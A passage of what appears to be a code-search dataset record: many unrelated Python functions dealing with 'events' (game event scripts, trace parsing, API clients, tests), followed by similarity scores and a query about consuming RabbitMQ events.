Sen's Fortress.\n run_event(11515050) # Offend Pale Demon and cut off Fortress return.\n run_event(11510120) # Enable special effect 4501 in Darkmoon Tomb.\n run_event(11510130) # (Updated) Control Dark Anor Londo enemies.\n # (Gone) Player always respawns at 'Anor Londo' bonfire in Dark Anor Londo.\n run_event(11510460) # Kneel to Darkmoon Covenant.\n run_event(11510462) # Two-frame sync for above.\n run_event(11510461) # Kneel to Darkmoon Covenant, simple version.\n run_event(11510140) # Move your bloodstain out of endless Gwyndolin corridor when you win.\n run_event(11510150) # Trigger flag for quivering Black Eye Orb.\n run_event(11512008) # (New) Message that Thrall has fled higher again.\n\n run_event(11512043) # (NEW) Monitor resting at Sun Chamber bonfire for warping (11512045).\n run_event(11512044) # (NEW) Monitor resting at Gwyn's Altar bonfire for warping (11512046).\n\n run_event(151)\n run_event(11510215)\n\n # Sentinel shield parts.\n for slot, sentinel_id in zip(range(14), range(1510400, 1510414)):\n run_event_with_slot(11515060, slot, (sentinel_id,))\n\n # Gargoyle tails removed.\n\n # One-way shortcut doors.\n run_event_with_slot(11510260, 0, (11510251, 1512251, 1512250), 'iii')\n run_event_with_slot(11510260, 1, (11510257, 1512253, 1512252), 'iii')\n run_event_with_slot(11510260, 2, (11510258, 1512255, 1512254), 'iii')\n\n # ORNSTEIN AND SMOUGH / GWYN, LORD OF LIGHT\n\n sound.disable_map_sound(1513800) # Ornstein and Smough.\n sound.disable_map_sound(1513805) # Gwyn.\n\n # GWYN:\n run_event(11512200) # Gwyn trigger.\n run_event(11512201) # Gwyn death.\n skip_if_event_flag_on(22, EVENT.AnorLondoGwynWarp) # Skip O&S events (light and dark). Keep an eye on length.\n\n skip_if_event_flag_off(10, EVENT.OrnsteinAndSmoughDead)\n # Already dead:\n anim.force_animation(1511401, 0, loop=True) # Start elevators\n anim.force_animation(1511402, 0, loop=True)\n run_event(11515392)\n for fog_wall, fog_sfx in zip((1511990, 1511992, 1511988), (1511991, 1511993, 1511989)):\n obj.disable(fog_wall)\n sfx.delete_map_sfx(fog_sfx, False)\n skip(11)\n\n # Alive:\n for relative_id in (5390, 5391, 5393, 5392, 1, 5394, 5395, 5396, 5397, 5398, 5399):\n run_event(BASE_FLAG + relative_id)\n\n # FORSAKEN KNIGHT ORNSTEIN & SUN-EATER SMOUGH\n\n run_event(11515492) # Trigger. Handles all other events within.\n run_event(11512001) # Die.\n\n # DARK SUN GWYNDOLIN\n\n sound.disable_map_sound(1513802)\n skip_if_event_flag_off(6, EVENT.GwyndolinDead)\n # Already dead:\n run_event(11515382)\n obj.disable(1511890)\n sfx.delete_map_sfx(1511891, False)\n obj.disable(1511892)\n sfx.delete_map_sfx(1511893, False)\n skip(13)\n # Alive:\n # Disable Jareel fog (otherwise visible in boss start cutscene).\n obj.disable(1511970)\n sfx.delete_map_sfx(1511971, False)\n obj.disable(1511972)\n sfx.delete_map_sfx(1511973, False)\n for relative_id in (5380, 5381, 5383, 5382, 900, 5384, 5385, 5386, 450):\n run_event(BASE_FLAG + relative_id)\n\n # NEW: Abyssal King Jareel.\n sound.disable_map_sound(1513803)\n skip_if_event_flag_off(6, EVENT.JareelDead)\n # Already dead:\n run_event(11515372)\n obj.disable(1511970)\n sfx.delete_map_sfx(1511971, False)\n obj.disable(1511972)\n sfx.delete_map_sfx(1511973, False)\n skip(7)\n # Alive:\n run_event(11515370)\n run_event(11515371)\n run_event(11515373)\n run_event(11515372)\n run_event(11515374)\n run_event(11515375)\n run_event(11510901)\n\n # Open three doors for enemies (I think).\n for relative_door_id, base_slot in zip((251, 257, 258), (0, 20, 40)):\n run_event_with_slot(11510710, base_slot, (BASE_FLAG + relative_door_id, 6750,\n 1512000 + relative_door_id, 1512000 + relative_door_id - 1))\n for i, relative_enemy_id in enumerate((300, 301, 302, 305, 320, 321, 322, # Silver Knights\n 323, 324, 325, 326, 327, 328, 329, 500,\n 177, 178, 179, 180, 181, 181, 182, 183, # Darkwraiths\n 184, 185, 186, 187, 188, 189, 190)):\n run_event_with_slot(\n 11510710, base_slot + i + 1, (BASE_FLAG + relative_door_id, 1510000 + relative_enemy_id,\n 1512000 + relative_door_id, 1512000 + relative_door_id - 1))\n\n # Mimic triggers.\n for slot, relative_mimic_id in enumerate(range(4)):\n run_event_with_slot(11515200, slot, (1510200 + relative_mimic_id,))\n run_event_with_slot(11515210, slot, (1510200 + relative_mimic_id,))\n run_event_with_slot(11515220, slot, (1510200 + relative_mimic_id,))\n run_event_with_slot(11515230, slot, (1510200 + relative_mimic_id,))\n run_event_with_slot(11515240, slot, (1510200 + relative_mimic_id, 1512010 + relative_mimic_id))\n run_event_with_slot(11510850, slot, (1510200 + relative_mimic_id,))\n run_event_with_slot(11515190, slot, (1510200 + relative_mimic_id,))\n\n # Treasure chests.\n for i in range(1, 21):\n if i == 12 or i == 19:\n continue\n run_event_with_slot(11510600, i, (1511650 + i, 11510600 + i))\n anim.end_animation(1511662, 0) # Gwyn's chest already looted\n # Only activate chapel chest before Dark Anor Londo (replaced by Mimic).\n skip_if_event_flag_on(1, EVENT.DarkAnorLondo)\n run_event_with_slot(11510600, 19, (1511669, 11510619))\n\n # Non-respawning enemies.\n run_event_with_slot(11510860, 0, (1510250, 0)) # Haunting Semblance\n run_event_with_slot(11510860, 3, (6640, 0)) # Dark Anor Londo Knight 1\n run_event_with_slot(11510860, 4, (6650, 0)) # Dark Anor Londo Knight 2\n run_event_with_slot(11510870, 0, (CHR.DarkmoonGuardian,))\n\n # NEW: Allied Silver Knights and Sentinels stop respawning in Dark Anor Londo if killed (unless Jareel is dead).\n for slot, enemy_id in enumerate(DarkAnorLondoAllies):\n run_event_with_slot(11512050, slot, (enemy_id,))\n run_event_with_slot(11512150, slot, (enemy_id,)) # They also turn hostile again if attacked in Dark AL.\n\n # NEW: Darkwraiths stop respawning in Dark Anor Londo if killed (unless Jareel is alive).\n for slot, enemy_id in enumerate(Darkwraiths):\n run_event_with_slot(11512100, slot, (enemy_id,))\n\n # NEW: Scripted rampart battle between archers and Darkwraiths. Also disables gravity\n # for the high archer.\n run_event(11512040)\n\n # NEW: Scripted battle between Darkwraith and Pale Demons.\n run_event(11512041)\n\n # NEW: Angry Giant Blacksmith in Dark Anor Londo.\n run_event(11512042)\n\n # NEW: Capricious Thrall one-off attack on the rooftop.\n sound.disable_map_sound(1513804)\n obj.disable(1511974)\n sfx.delete_map_sfx(1511975, False)\n obj.disable(1511976)\n sfx.delete_map_sfx(1511977, False)\n obj.disable(1511978)\n sfx.delete_map_sfx(1511979, False)\n run_event(11512060) # Trigger and timer.\n run_event(11512061) # Death.", "def extract_all_io_events(events):\n result = []\n for e in events:\n evt = IpuTraceEvent.FromString(e)\n if evt.type in [\n IpuTraceEvent.HOST_TO_DEVICE_TRANSFER,\n IpuTraceEvent.DEVICE_TO_HOST_TRANSFER\n ]:\n try:\n payload = json.loads(evt.data_transfer.data_transfer.decode('utf-8'))\n for t in payload[\"tensors\"]:\n result += [(evt.type, t[\"name\"])]\n except UnicodeDecodeError:\n pass\n return result", "def action(self):\n # --- Ruled Based Test Policy ---\n # Stay still just send communication event\n if self.uid == 0:\n if random.choice(list(range(50))) == 1 and self.comm_count < self.comm_limit:\n action = 3\n action_param = {}\n self.comm_count += 1\n else:\n action = 1\n action_param = {\"ang_accel\": (0 * math.pi / 180), \"accel\": 0}\n return action, action_param\n\n # Others\n # If wall in vision, rotate\n vision_array = self.vision[1]\n if 1 in vision_array[0]:\n accel = -1 if self.speed > 0 else 0\n action = 1\n action_param = {\"ang_accel\": (random.randint(20, 45) * math.pi / 180), \"accel\": accel}\n\n # If hider in front, tag\n elif self.agt_class == 3 and 2 in vision_array[0] and vision_array[1][list(vision_array[0]).index(2)] < 60:\n action = 2\n action_param = {}\n\n # Randomly invoked communication event\n # elif random.choice(list(range(50))) == 1 and self.comm_count < self.comm_limit:\n # action = 3\n # action_param = {}\n # self.comm_count += 1\n\n # If communication received head towards nearest comm. agent for three steps\n elif len(self.comm) > 0:\n closest_agent = min(self.comm, key=lambda x: x[0])\n\n # Calculate target angle to the event sender\n target_angle = closest_agent[1] + self.angle\n target_angle = 2*math.pi + target_angle if target_angle < 0 else target_angle\n target_angle = target_angle - 2*math.pi if target_angle > 2*math.pi else target_angle\n\n # Add target angle to history such that the agent moves until it finds the target angle\n self.history.append(target_angle)\n direction = closest_agent[1]/abs(closest_agent[1])\n action = 1\n action_param = {\"ang_accel\": direction*math.pi/18, \"accel\": -1 if self.speed > 0 else 0}\n\n # If target angle not found, continue searching\n elif len(self.history) > 0:\n direction = self.history[-1]/abs(self.history[-1])\n action = 1\n action_param = {\"ang_accel\": direction*math.pi/18, \"accel\": -1 if self.speed > 0 else 0}\n if self.history[-1] - math.pi/9 < self.angle < self.history[-1] + math.pi/9:\n self.history.pop(-1)\n\n # When there isn't a special event, just move forward\n else:\n st_rate = self.stamina/self.max_stamina\n if st_rate > 0.75:\n accel = np.random.normal(3, 1, 1)\n elif st_rate > 0.4:\n accel = np.random.randint(-1, 3)\n else:\n accel = -1\n action = 1\n action_param = {\"ang_accel\": (0 * math.pi / 180), \"accel\": accel}\n\n return action, action_param", "def dispatch_requests(\n self, run_to_events: Dict[str, Generator[tf.compat.v1.Event, None, None]]\n ):\n for (run_name, events) in run_to_events.items():\n self._dispatch_additional_senders(run_name)\n if events is not None:\n for event in events:\n _filter_graph_defs(event)\n for value in event.summary.value:\n self._request_sender.send_request(run_name, event, value)\n self._request_sender.flush()", "async def reporters(self, eventID: str) -> Iterable[str]:", "def event(self,evt,evn):\n #import pdb; pdb.set_trace()\n if (evt.get(\"skip_event\")):\n return\n # check if FEE data is one or two dimensional\n data = evt.get(Camera.FrameV1, self.src)\n if data is None:\n one_D = True\n data = evt.get(Bld.BldDataSpectrometerV1, self.src)\n else:\n one_D = False\n # get event timestamp\n timestamp = cspad_tbx.evt_timestamp(cspad_tbx.evt_time(evt)) # human readable format\n\n if data is None:\n self.nnodata +=1\n #self.logger.warning(\"event(): No spectrum data\")\n evt.put(skip_event_flag(),\"skip_event\")\n\n if timestamp is None:\n evt.put(skip_event_flag(),\"skip_event\")\n #self.logger.warning(\"event(): No TIMESTAMP, skipping shot\")\n\n elif data is not None:\n self.nshots +=1\n # get data as array and split into two half to find each peak\n if one_D:\n # filtering out outlier spikes in FEE data\n data = np.array(data.hproj().astype(np.float64))\n for i in range(len(data)):\n if data[i]>1000000000:\n data[i]=data[i]-(2**32)\n if self.dark is not None:\n data = data - self.dark\n spectrum = data\n spectrum1 = data[:data.shape[0]//2]\n spectrum2 = data[data.shape[0]//2:]\n else:\n data = np.array(data.data16().astype(np.int32))\n if self.dark is not None:\n data = data - self.dark\n data = np.double(data)\n data_split1 = data[:,:data.shape[1]//2]\n data_split2 = data[:,data.shape[1]//2:]\n # make a 1D trace of entire spectrum and each half to find peaks\n spectrum = np.sum(data,0)/data.shape[0]\n spectrum1 = np.sum(data_split1,0)/data_split1.shape[0]\n spectrum2 = np.sum(data_split2,0)/data_split2.shape[0]\n if not one_D:\n # the x-coordinate of the weighted center of peak region\n weighted_peak_one_positions = []\n for i in range(self.peak_one_range_min,self.peak_one_range_max):\n weighted_peak_one_positions.append(spectrum[i]*i)\n weighted_sum_peak_one = np.sum(weighted_peak_one_positions)\n weighted_peak_one_center_position = weighted_sum_peak_one/np.sum(spectrum[self.peak_one_range_min:self.peak_one_range_max])\n\n weighted_peak_two_positions = []\n for i in range(self.peak_two_range_min,self.peak_two_range_max):\n weighted_peak_two_positions.append(spectrum[i]*i)\n weighted_sum_peak_two = np.sum(weighted_peak_two_positions)\n weighted_peak_two_center_position = weighted_sum_peak_two/np.sum(spectrum[self.peak_two_range_min:self.peak_two_range_max])\n\n # normalized integrated regions between the peaks\n #int_left_region = np.sum(spectrum[weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2:(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n int_left_region = np.sum(spectrum[:weighted_peak_two_center_position/2])\n\n #int_left_region_norm = np.sum(spectrum[weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2:(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])/len(spectrum[weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2:(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n int_left_region_norm = np.sum(spectrum[:weighted_peak_two_center_position/2])/len(spectrum[:weighted_peak_two_center_position/2])\n\n int_right_region = np.sum(spectrum[self.peak_two_range_max:])\n\n int_right_region_norm = np.sum(spectrum[self.peak_two_range_max:])/len(spectrum[self.peak_two_range_max:])\n\n # normalized integrated peaks\n int_peak_one = np.sum(spectrum[(weighted_peak_one_center_position-len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2):(weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2)])\n\n int_peak_one_norm = np.sum(spectrum[(weighted_peak_one_center_position-len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2):(weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2)])/len(spectrum[(weighted_peak_one_center_position-len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2):(weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2)])\n\n int_peak_two = np.sum(spectrum[(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2):(weighted_peak_two_center_position+len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n\n int_peak_two_norm = np.sum(spectrum[(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2):(weighted_peak_two_center_position+len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])/len(spectrum[(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2):(weighted_peak_two_center_position+len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n\n if not one_D:\n if int_peak_one_norm/int_peak_two_norm > self.peak_ratio:\n print(\"event(): inflection peak too high\")\n evt.put(skip_event_flag(), \"skip_event\")\n return\n if int_left_region_norm > self.normalized_peak_to_noise_ratio*int_peak_two_norm:\n print(\"event(): noisy left of low energy peak\")\n evt.put(skip_event_flag(), \"skip_event\")\n return\n if int_right_region_norm > self.normalized_peak_to_noise_ratio*int_peak_two_norm:\n print(\"event(): noisy right of high energy peak\")\n evt.put(skip_event_flag(), \"skip_event\")\n return\n #self.logger.info(\"TIMESTAMP %s accepted\" %timestamp)\n self.naccepted += 1\n self.ntwo_color += 1\n print(\"%d Remote shot\" %self.ntwo_color)\n print(\"%s Remote timestamp\" %timestamp)", "def _extract_pre_basecalled_events(self):\n\t\t# try:\n\t\ttable = self.hdf5file[fastq_paths[self.version]['pre_basecalled']]\n\t\tevents = []\n\t\tfor read in table:\n\t\t\tevents.extend(table[read][\"Events\"][()])\n\t\tself.pre_basecalled_events = [Event(x) for x in events]\n\t\t# except Exception, e:\n\t\t\t# self.pre_basecalled_events = []", "def test_process_packet_event(self):\n pkt = {'type': 'event',\n 'name': 'woot',\n 'endpoint': '',\n 'args': []}\n self.ns.process_packet(pkt)\n assert not self.environ['socketio'].error.called\n\n # processing an event packet with message id and ack\n pkt = {'type': 'event',\n 'id': 1,\n 'ack': 'data',\n 'name': 'tobi',\n 'endpoint': '',\n 'args': []}\n self.ns.process_packet(pkt)\n assert not self.environ['socketio'].error.called", "def find_events(handler_input):\n \n slots = handler_input.request_envelope.request.intent.slots\n \n selected_event = slots['event_cat'].resolutions.resolutions_per_authority[0].values[0].value.name\n \n events_list = requests.get(\"http://3.17.148.9:8080/events\")\n length = 0\n\n if events_list.status_code == 200:\n events_list = events_list.content\n details = json.loads(events_list.decode('utf-8'))\n length = len(details)\n\n events = dict()\n response_text = \"\"\n for i in range(length):\n if details[i][\"event_category\"].lower() == selected_event:\n cat = details[i]['event']\n if cat not in events:\n events[cat] = 1\n else:\n events[cat] += 1\n \n for event, count in events.items():\n response_text += str(count) + + event+\", \"\n\n speech_text = \"I found {}\".format(response_text)\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"I found {}\".format(response_text), speech_text)).set_should_end_session(False)\n return handler_input.response_builder.response", "def test_api_predictor_events_get(self):\n pass", "def doeventmonitor(self):\n # this support must be explicitly turned on; by default, CORE will\n # generate the EMANE events when nodes are moved\n return self.session.get_config_item_bool(\"emane_event_monitor\", False)", "def event_filters(self) -> pulumi.Output[Sequence['outputs.EventFilterResponse']]:\n return pulumi.get(self, \"event_filters\")", "def events(self):\r\n return e.Events(self)", "def test_otoroshi_controllers_adminapi_events_controller_alert_events(self):\n pass", "def events(self, start=0, limit=15, etype=None):\r\n params = base.get_params(('start', 'limit', 'etype'), locals())\r\n url = '{0}/events/'.format(self.get_url())\r\n request = http.Request('GET', url, params)\r\n\r\n return request, parsers.parse_json", "def events(self, start=0, limit=15, etype=None):\r\n params = base.get_params(('start', 'limit', 'etype'), locals())\r\n url = '{0}/events/'.format(self.get_url())\r\n request = http.Request('GET', url, params)\r\n\r\n return request, parsers.parse_json", "def get_event_mapping():\r\n # Get all events:\r\n all_events = requests.get(base_url + 'check-ins/v2/events', headers=headers3).json()\r\n # Make Dict of event names and ids\r\n event_to_id = {event['attributes']['name']:event['id'] for event in all_events['data']} \r\n return event_to_id", "def events(self):\r\n return ev.Events(self)", "def events(self):\r\n return ev.Events(self)", "def get_events(self):\n events = []\n for device in self:\n events.extend(self[device].get_events())\n return events", "def _IncludedPaintEvents(self, events):\n def FirstLayoutTime(events):\n \"\"\"Get the start time of the first layout after a resource received.\"\"\"\n has_received_response = False\n for event in events:\n if event.name == 'ResourceReceiveResponse':\n has_received_response = True\n elif has_received_response and event.name == 'Layout':\n return event.start\n assert False, 'There were no layout events after resource receive events.'\n\n first_layout_time = FirstLayoutTime(events)\n paint_events = [e for e in events\n if e.start >= first_layout_time and e.name == 'Paint']\n return paint_events", "def get_possible_input(self):\n if self.possible_events:\n return [] + self.possible_events\n possible_events = []\n enabled_view_ids = []\n touch_exclude_view_ids = set()\n for view_dict in self.views:\n # exclude navigation bar if exists\n if self.__safe_dict_get(view_dict, 'enabled') and \\\n self.__safe_dict_get(view_dict, 'visible') and \\\n self.__safe_dict_get(view_dict, 'resource_id') not in \\\n ['android:id/navigationBarBackground',\n 'android:id/statusBarBackground']:\n enabled_view_ids.append(view_dict['temp_id'])\n # enabled_view_ids.reverse()\n\n for view_id in enabled_view_ids:\n if self.__safe_dict_get(self.views[view_id], 'clickable'):\n possible_events.append(TouchEvent(view=self.views[view_id]))\n touch_exclude_view_ids.add(view_id)\n touch_exclude_view_ids.union(self.get_all_children(self.views[view_id]))\n\n for view_id in enabled_view_ids:\n if self.__safe_dict_get(self.views[view_id], 'scrollable'):\n possible_events.append(ScrollEvent(view=self.views[view_id], direction=\"UP\"))\n possible_events.append(ScrollEvent(view=self.views[view_id], direction=\"DOWN\"))\n possible_events.append(ScrollEvent(view=self.views[view_id], direction=\"LEFT\"))\n possible_events.append(ScrollEvent(view=self.views[view_id], direction=\"RIGHT\"))\n\n for view_id in enabled_view_ids:\n if self.__safe_dict_get(self.views[view_id], 'checkable'):\n possible_events.append(TouchEvent(view=self.views[view_id]))\n touch_exclude_view_ids.add(view_id)\n touch_exclude_view_ids.union(self.get_all_children(self.views[view_id]))\n\n for view_id in enabled_view_ids:\n if self.__safe_dict_get(self.views[view_id], 'long_clickable'):\n possible_events.append(LongTouchEvent(view=self.views[view_id]))\n\n for view_id in enabled_view_ids:\n if self.__safe_dict_get(self.views[view_id], 'editable'):\n possible_events.append(SetTextEvent(view=self.views[view_id], text=\"Hello World\"))\n touch_exclude_view_ids.add(view_id)\n # TODO figure out what event can be sent to editable views\n pass\n\n for view_id in enabled_view_ids:\n if view_id in touch_exclude_view_ids:\n continue\n children = self.__safe_dict_get(self.views[view_id], 'children')\n if children and len(children) > 0:\n continue\n possible_events.append(TouchEvent(view=self.views[view_id]))\n\n # For old Android navigation bars\n # possible_events.append(KeyEvent(name=\"MENU\"))\n\n self.possible_events = possible_events\n return [] + possible_events", "def create_events():\n events = {}\n events[\"Workers_can_proceed\"] = mp.Event()\n for i in range(NUM_WORKERS):\n events[i] = mp.Event()\n return events", "def adbGetEvent( self, pars ):\n \n\t( id1, id2, id3, flag ) = pars\n\n\tif id3 == 1:\n\n\t e\t= self.adb.get( 'logEvents' )\n\t x\t= []\n\t y\t= []\n\t nx\t= 0\n\t ny\t= 0\n\t for j in range(e.shape[0]):\n\t\tif e[j,0] == id1 and e[j,1] == id2:\n\t\t if ny <= nx:\n\t\t\ty.append( e[j,2] )\n\t\t\tny\t+= 1\n\t\tif e[j,0] == _EVENT_TS and nx < ny:\n\t\t x.append( e[j,2] )\n\t\t nx\t+= 1\n\n\telif id3 == 2:\n\n\t e\t= self.adb.get( 'logEvents' )\n\t x\t= []\n\t y\t= []\n\t nx\t= 0\n\t ny\t= 0\n\t for j in range(e.shape[0]):\n\t\tif e[j,0] == id1 and e[j,1] == id2:\n\t\t if ny <= nx:\n\t\t\ty.append( e[j,2] )\n\t\t\tny\t+= 1\n\t\t else:\n\t\t\ty[-1]\t= e[j,2]\n\t\tif e[j,0] == _EVENT_TS and nx < ny:\n\t\t x.append( e[j,2] )\n\t\t nx\t+= 1\n\n\telif id3 == 3:\n\n\t e\t= self.adb.get( 'logEvents' )\n\t x\t= []\n\t y\t= []\n\t nx\t= 0\n\t ny\t= 0\n\t for j in range(e.shape[0]):\n\t\tif e[j,0] == id1 and e[j,1] == id2:\n\t\t y.append( e[j,2] )\n\t\t ny\t+= 1\n\t\tif e[j,0] == _EVENT_TS and nx < ny:\n\t\t n\t= ny - nx\n\t\t dx\t= 1. / n\n\t\t for i in range(1,n+1):\n\t\t\tx.append( e[j,2] - dx * (n-i) )\n\t\t nx\t+= n\n\n\telse:\n\n\t e\t= self.adb.get( 'logEvents' )\n\t x\t= self.adb.get( 'steps' )\n\t y\t= []\n\t for j in range(e.shape[0]):\n\t\tif e[j,0] == id1 and e[j,1] == id2:\n\t\t y.append( e[j,2] )\n\n\tif flag == 1:\n\t y\t= numarray.array( y, 'd' )\n\t y\t= numarray.maximum( y, 1.e-20 )\n\n steps = self.adb.get( 'steps' )\n times = self.adb.get( 'times' )\n tIncs = self.adb.get( 'timeIncs' )\n nSteps = len( steps )\n xt = []\n i = 0\n for j in range(len(x)):\n while i < nSteps and steps[i] < x[j]:\n i += 1\n t = times[i] + (x[j] - steps[i]) * tIncs[i]\n xt.append( t )\n \n\tx \t= numarray.array( x ).flat\n\txt \t= numarray.array( xt ).flat\n\ty \t= numarray.array( y ).flat\n return( x, xt, y )", "def get_all(self):\r\n return list(pecan.request.storage_conn.get_event_types())", "def both_events(self, Rover, name1, name2):\n func1 = self.event.get(name1)\n func2 = self.event.get(name2)\n return func1(Rover) and func2(Rover)", "def InitOtherEvents(self):\n\n pass", "def get_destination(event):\n if 'type' in event and event['type'] in logs:\n return logs[ event['type'] ]\n\n elif 'route' in event and event['route'] in logs:\n return logs[ event['route'] ]\n\n return logs.get('console')", "def get_network_events(self,\r\n options=dict()):\r\n\r\n # Validate required parameters\r\n self.validate_parameters(network_id=options.get(\"network_id\"))\r\n\r\n # Prepare query URL\r\n _url_path = '/networks/{networkId}/events'\r\n _url_path = APIHelper.append_url_with_template_parameters(_url_path, { \r\n 'networkId': options.get('network_id', None)\r\n })\r\n _query_builder = Configuration.base_uri\r\n _query_builder += _url_path\r\n _query_parameters = {\r\n 'productType': options.get('product_type', None),\r\n 'includedEventTypes': options.get('included_event_types', None),\r\n 'excludedEventTypes': options.get('excluded_event_types', None),\r\n 'deviceMac': options.get('device_mac', None),\r\n 'deviceSerial': options.get('device_serial', None),\r\n 'deviceName': options.get('device_name', None),\r\n 'clientIp': options.get('client_ip', None),\r\n 'clientMac': options.get('client_mac', None),\r\n 'clientName': options.get('client_name', None),\r\n 'smDeviceMac': options.get('sm_device_mac', None),\r\n 'smDeviceName': options.get('sm_device_name', None),\r\n 'perPage': options.get('per_page', None),\r\n 'startingAfter': options.get('starting_after', None),\r\n 'endingBefore': options.get('ending_before', None)\r\n }\r\n _query_builder = APIHelper.append_url_with_query_parameters(_query_builder,\r\n _query_parameters, Configuration.array_serialization)\r\n _query_url = APIHelper.clean_url(_query_builder)\r\n\r\n # Prepare headers\r\n _headers = {\r\n 'accept': 'application/json'\r\n }\r\n\r\n # Prepare and execute request\r\n _request = self.http_client.get(_query_url, headers=_headers)\r\n CustomHeaderAuth.apply(_request)\r\n _context = self.execute_request(_request)\r\n self.validate_response(_context)\r\n\r\n # Return appropriate type\r\n return APIHelper.json_deserialize(_context.response.raw_body)", "def receiverMapping():", "def get_hosts(self, target, listener_type):", "def _send_to_endpoint(self, events):\n raise NotImplementedError('Please implement _send_to_endpoint().')", "def get_api_event(self):\n pass", "def bootstrap_core_events() -> Sequence[EventDefinition[Any]]: # type: ignore\n return (\n (\n EVENT_ID_EVENT_LISTENER_ADDED,\n QUEUE_EVENT_NORMAL, CONSUME_EVENT_PROTECTION,\n EventListenerAddedEvent,\n EventListenerAddedEvent(EVENT_ID_EVENT_LISTENER_ADDED, NOT_PARTICIPANT),\n ),\n (\n EVENT_ID_REGISTER_EVENT,\n QUEUE_EVENT_HIGH, PRODUCE_EVENT_PROTECTION,\n RegisterEventEvent,\n RegisterEventEvent(\n EVENT_ID_DISPOSE_COMPLETE, QUEUE_EVENT_IO, GLOBAL_EVENT_PROTECTION,\n DisposeCompleteEvent, DisposeCompleteEvent(NOT_PARTICIPANT)\n ),\n ),\n (\n EVENT_ID_DISPOSE_COMPLETE,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n DisposeCompleteEvent,\n DisposeCompleteEvent(NOT_PARTICIPANT),\n ),\n (\n EVENT_ID_REQUEST_DISPOSE,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n RequestDisposeEvent,\n RequestDisposeEvent(NOT_PARTICIPANT),\n ),\n (\n EVENT_ID_COMPONENT_CREATED,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n ComponentCreatedEvent,\n ComponentCreatedEvent(NOT_PARTICIPANT, 1),\n ),\n (\n EVENT_ID_COMPONENT_CREATION_FAILED,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n ComponentCreationFailedEvent,\n ComponentCreationFailedEvent('x', 1, UserMessage(i18n(''))),\n ),\n (\n EVENT_ID_REQUEST_NEW_COMPONENT,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n RequestNewComponentEvent,\n RequestNewComponentEvent(object(), NOT_PARTICIPANT, 1),\n ),\n (\n EVENT_ID_SYSTEM_STARTED,\n QUEUE_EVENT_NORMAL, CONSUME_EVENT_PROTECTION,\n SystemStartedEvent,\n SystemStartedEvent(),\n ),\n (\n EVENT_ID_SYSTEM_HALTED,\n QUEUE_EVENT_NORMAL, CONSUME_EVENT_PROTECTION,\n SystemHaltedEvent,\n SystemHaltedEvent()\n ),\n (\n EVENT_ID_ERROR,\n QUEUE_EVENT_HIGH, GLOBAL_EVENT_PROTECTION,\n ErrorEvent,\n ErrorEvent(ErrorReport('', ERROR_CATEGORY_USER, UserMessage(i18n(''))))\n ),\n )", "def get_events_batch() -> PayloadDictList:\n ...", "def event_log(self):\n pass" ]
[ "0.61217207", "0.55249405", "0.55249405", "0.5509148", "0.54260296", "0.53321046", "0.52999175", "0.52999175", "0.5238973", "0.5216273", "0.51892865", "0.51738495", "0.5165304", "0.51611227", "0.5153233", "0.51480025", "0.5140899", "0.51364225", "0.5098679", "0.50892186", "0.50705093", "0.5047507", "0.5023797", "0.5020151", "0.50179183", "0.5015156", "0.49881816", "0.49871737", "0.49834684", "0.4979714", "0.49514532", "0.49497008", "0.49453348", "0.4944602", "0.49353752", "0.4931676", "0.4927875", "0.4926667", "0.49103305", "0.49097088", "0.4904969", "0.4896881", "0.48931947", "0.48910326", "0.4889296", "0.48858628", "0.48850763", "0.48817575", "0.48797438", "0.4879215", "0.48755395", "0.48749632", "0.48715886", "0.4864401", "0.48634514", "0.4863281", "0.48602217", "0.48447776", "0.4843706", "0.4843706", "0.4839884", "0.4837274", "0.48359066", "0.48245016", "0.48205817", "0.48182014", "0.48160395", "0.48120746", "0.48092705", "0.4807888", "0.4806217", "0.4785315", "0.4773443", "0.47728893", "0.4769252", "0.4766935", "0.4762739", "0.4760643", "0.4754781", "0.47498062", "0.47498062", "0.47460216", "0.474252", "0.474252", "0.4740265", "0.47380275", "0.4737415", "0.472879", "0.47169113", "0.47147387", "0.47144756", "0.47141626", "0.47120908", "0.47110295", "0.4710771", "0.47102684", "0.47084495", "0.47054228", "0.47029775", "0.46993297", "0.4697782" ]
0.0
-1
Prepare to process RabbitMQ events and start consuming
